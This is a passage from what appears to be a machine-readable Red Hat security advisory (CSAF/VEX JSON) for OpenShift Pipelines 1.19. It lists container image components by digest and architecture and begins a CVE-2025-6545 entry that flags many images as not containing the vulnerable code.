"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-6545",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-06-23T19:00:51.575615+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
